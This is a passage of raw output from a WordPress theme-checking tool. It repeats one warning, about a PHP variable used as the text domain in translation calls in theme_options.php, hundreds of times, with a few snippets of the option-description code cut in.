should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. 440: 'subtitle' => __('in seconds ex: 1 hour = 60*60 = 3600 ', $mom_textdomain),Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. 802: 'desc' => __('the number of posts to display ads after it. default is 3', $mom_textdoPossible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. 1741: 'desc' => __('retina logo must be your logo in double size if original logo is 150*70Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. 2020: 'subtitle' => __('Saperate each category id with comma e.g. 5,11,20', $mom_textdomain),Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible variable $mom_textdomain found in translation function in theme_options.php. Translation function calls should not contain PHP variables. Possible 